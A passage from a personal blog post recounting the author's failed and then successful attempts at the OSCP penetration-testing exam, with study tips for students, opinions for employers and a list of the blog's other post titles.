Family and friends were needed to pick me up the next day. Words of encouragement and long talks convinced me that I could do this. Really this is the challenge that I was originally looking for. Now I have found that challenge and I am going to quit because it’s not easy? Hell no. I wrote up the lame pentest report and sent it off to Offensive Security. 2 days later that dreaded you failed email came. I knew it was coming but man did it ever hurt. Someone else out there knows how poorly I did. Ouch. Funny thing is I found out that you can’t rebook your challenge until you get that rejection email. Wonder if I was the first one to try and reschedule before finding out for sure if they failed?

I rescheduled for the soonest weekend that fit into my schedule. I did this for one main reason. It kept me extremely focused and made me get over the failure very quickly. Hell who’s got time to feel sorry for themselves when you got to do the challenge again? Offensive Security is very kind and has priced the challenge retake very low. Thank you, because this one I had to pay for myself. Again together with other PWB students a plan was formed, code was compiled and a strategy was formed.

Over the next 2-3 weeks many test machines were created, and exploited. I had figured from other reviews on the internet that I was not going to face the same challenge as the first time so I’d better be ready.

Linux and Windows Privilege Escalation “Libraries” were built
A detailed 24 hour plan was created with structured breaks and machine rotation
- First 3 hours were reconnaissance
- Then 1.5 hours per machine in a rotation
- Whiteboard was prepped to keep notes on important machine details like OS and kernel ver.
- A list of questions was made to help me think when I got stuck on machines
- A very detailed procedure was created with commands for recon work.

Saturday May 25th, 2013 – 7:00 AM …. I screwed up the time zone thing again. Wait until 8:00 AM. The exam package came in. A huge break the “buffer overflow” box was repeated in this challenge. This was the only box I rooted in the previous attempt. Thank the gods I haven’t even started typing and I know I have 25 points.

I followed my plan. Recon work, then break, did the buffer overflow box. Bingo! 25 points, only 45 more needed and I am only 3 hours in. Then limited shells on 2 boxes. When I stopped for my lunch break (away from my computer) I was feeling good. I should have this done in time to get to bed at a decent time.

After my lunch I hit a wall. Nothing was working and I just couldn’t make progress. Then at around 5:30 PM I got another box! That really picked me up and I was starting to feel energized again. But no more progress was made, I broke my schedule and skipped my dinner break … oh no, things were starting to fall apart and failure was looking like a reality again.

10:00 PM I went home I was going to sleep until 2:00 AM and get back at it. However I was still wide awake at 10:45 PM … I wasn’t going to sleep. Back to the office I went. Crazy good luck ensued and by 2:00 AM I had another box and another limited shell. However that was all that I was to get that night. 6:00 AM I went back home and slept … for a whopping 2 hours when I was woken by a phone call. So back to the office, I was awake anyway and I needed to write that report.

I looked at what I had done and with access to the challenge lab cut off I could do no more work. Am I gonna make it? I knew I had a solid amount of points but how does Offensive Security give partial points, and will the report be good enough to get all of the points for the work I did? I wrote the report and put as much detail in it as I could. I was even thinking of attaching some kind bribe on the report. Is there a way to attach a couple hundred “pay pal” bucks to a pdf? Well either way I packaged it all up ( no bribe included ), said a little prayer and hit send.

I waited … waited … and even though the reply was in, in just over 24 hours it felt like an eternity. Then 3 minutes before I was to leave work for the day I got the email. Holly crap I passed! My eyes started tearing up a little and I was ecstatic! I learnt the lessons, I fought a good fight, I didn’t make it by a lot I know … but the point was I made it. I wanted the challenge, it was presented to me, and I had risen up and proved myself.

Once a student has passed the challenge they are given access to a new area in the forum where discussing the challenge is permitted. I looked up where I fell short immediately. Go figure the first box I didn’t get … I had that exploit already compiled in my library … what the hell? So I went back to my notes and some how I didn’t try it. Another reason to make a detailed attack strategy with a sequence to follow. The second box I missed well let’s just say I want to kick my own ass for not getting that. So obvious that I completely ignored it thinking that they wouldn’t make it that easy. So the interesting thing is the points that I missed was not due to lack of knowledge but because I did not follow a strict procedure to gain access.

I now hold the OSCP certification and I hold it above all other certs. I put in close to 400 hours of my time into this course, broke 2 keyboards in frustration, and almost lost one LCD. It is not that this cert means more than the others, it is because this cert was truly earned. I worked hard for this one and in the process learnt a lot about pen testing, exploitation, and myself. It is an experience that I will never forget.

What Students Should Know

From my entire experience here is what I wish I found on the net before I started.

When in the labs use metasploit, but every time you do make sure you can exploit the machine by hand as well
Do every extra mile exercise, they really do help you learn the material
Play in the Offsec lab’s hacking utopia as long as you can and have fun with it at the same time
Reach out to other students. Peer support is worth so much. To the guys that supported me thank you! I couldn’t have done it without you.
When working through the lab keep all exploits you have used on your local machine, neatly organized, and leave yourself readme files of where you found the exploit and which systems it will work on
Even though enumeration isn’t as fun and exciting as exploitation PRACTICE it and have good notes. The challenge is pretty much built to fail you if you don’t have good enumeration techniques
Go into the challenge with a solid attack strategy
Make lists and notes to keep yourself on track in the challenge
If you are working from a virtual machine, take snapshots of it … you never know when it will break
Don’t update metasploit when connected to the labs … for some reason it seems to really break it. This happened to myself and one other student that I talked with
If you are married or are in a relationship you better hope they are understanding or you will be single by the end. A big thanks to my wife, family, and friends who helped me through this!

What Employers Need To Know

The OSCP certification is hard to get.
If you are looking for a technical security guy/gal or pen tester, look for an OSCP. If you are looking for a policy writer or manager then get a CISSP.
OSCP holders have proven that they have a solid understanding of penetration testing and computer security on multiple platforms
From my experience and what I have read an OSCP will be more technical and have a better understanding of penetration testing than a CEH (my opinion only)
The OSCP is one of a handful of certifications that is achieved through hands on scenario testing rather than multiple choice. You can guess a, b, c, or d and have a %25 of getting it right. Lab scenarios there is no guessing.
For the most part I think students that have went through the PWB course and achieved the OSCP certification show dedication and exceptional work ethic (again my opinion only) or they are truly gifted and just breezed through it
For everyone who thinks IT Certification is a joke and not worth while – re-evaluate VPN scenario based testing. I see this as the future testing standard for all IT certifications.

So what’s next? Well that OSCE is looking pretty tough and I still have some hair left to pull out …

RabbidByte

The New Phish

Microsoft platform for Phishing … Microsoft

Offensive Security AWAE

Summary

Content

Introduction

Tools & Methodologies

Atmail Mail Server Appliance: from XSS to RCE

ATutor Authentication Bypass and RCE

ATutor LMS Type Juggling Vulnerability

ManageEngine Applications Manager SQLi to RCE

Bassmaster NodeJS Arbitrary JavaScript Injection

DotNetNuke Cookie Deserialization RCE

The Extra Mile

Type juggling

ManageEngine JSP

NodeJS Jailbreak

.NET Deserialization

Java Deserialization

Where Offensive Security got it Right

Where Offensive Security got it Wrong

Final Verdict

Hacker0x01 50m_ctf

Introduction

Summary:

Discovery of the application:

Disassembly of the APK

Use of default/weak administrative credentials:

SQL Injection Vulnerability

Information Disclosure:

Timing Attack:

Thermostat Update Page:

The CtF Source

Better Write-Ups than mine

KringleCon 2018

Summary

Results

Metasploit/Rapid7 CtF: 2018

Summary

3 of Clubs

3 of Diamonds

10 of Hearts

My Ranking

Hacker 101: CtF Series

Summary

AWS S3: Misconfiguration, Discovery, and Abuse

Summary

Find S3 Buckets (one way out of many)

Check for Write Permissions (2 different ways)

Get the ACL

Just Try to Write to the Bucket

Abuse: What Does the Bucket Contain

Note:

HackRF: The easy way

The Story

BUILD

Additional Reading

Transfer Any Binary into a Protected Network

Summary

How To Do It

Images From Testing

Offensive Security PWB (OSCP) - A Review

Summary

Reposted from another one of my blogs

In The Beginning

The Lab

The United Students of Offsec

The Challenge

What Students Should Know

What Employers Need To Know